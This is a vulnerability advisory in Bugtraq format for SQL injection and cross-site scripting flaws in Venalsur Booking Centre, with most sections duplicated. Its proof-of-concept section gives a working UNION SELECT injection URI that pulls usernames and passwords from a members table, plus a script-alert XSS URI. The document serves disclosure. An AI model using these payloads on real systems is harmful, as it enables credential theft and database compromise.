Venalsur Booking Centre SQL Injection and Cross Site Scripting Vulnerabilities
BID:31990
Info
Venalsur Booking Centre SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 31990 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6215 CVE-2008-6216 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 29 2008 12:00AM |
| Updated: | Mar 05 2009 09:26PM |
| Credit: | d3b4g |
| Vulnerable: |
Venalsur Booking Centre 0 |
| Not Vulnerable: | |
Discussion
Venalsur Booking Centre SQL Injection and Cross Site Scripting Vulnerabilities
Venalsur Booking Centre is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Venalsur Booking Centre is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Venalsur Booking Centre SQL Injection and Cross Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*
http://www.example.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert("XSS")</script>
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*
http://www.example.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert("XSS")</script>
Solution / Fix
Venalsur Booking Centre SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Venalsur Booking Centre SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- Venalsur Booking Centre Homepage (Venalsur)